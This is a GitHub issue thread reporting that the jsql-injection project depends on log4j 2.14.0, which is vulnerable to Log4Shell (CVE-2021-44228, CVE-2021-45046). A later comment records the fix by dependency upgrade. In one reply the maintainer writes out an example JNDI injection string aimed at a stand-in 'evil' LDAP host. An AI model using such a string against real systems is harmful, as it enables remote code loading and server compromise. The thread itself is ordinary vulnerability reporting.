jsql-injection icon indicating copy to clipboard operation
jsql-injection copied to clipboard
verified publisher icon ron190

Log4shell vulnerable

Open SecMyth opened this issue 4 years ago • 1 comments

What's the expected behavior?

pom.xml is adjusted to pull the latest log4j version

What's the actual behavior?

pom.xml requires log4j v2.14.0 which is vulnerable against CVE-2021-44228 and CVE-2021-45046)

Any other detailed information about the Issue?

See https://www.techsolvency.com/story-so-far/cve-2021-44228-log4j-log4shell/

Steps to reproduce the problem

  1. inspect pom.xml regarding log4j version

SecMyth avatar Dec 21 '21 14:12 SecMyth

I'm following this last Log4j CVE event too. While there's no real attack surface in the present case to hijack jSQL users, I'm wondering how an exploitation would look like, maybe in logging database name or HTTP header that looks like ${jndi:ldap://evil/class} for a given honeypot. Thanks for the report :+1:

ron190 avatar Dec 21 '21 17:12 ron190

Fixed by dependency upgrade.

ron190 avatar Jul 22 '23 19:07 ron190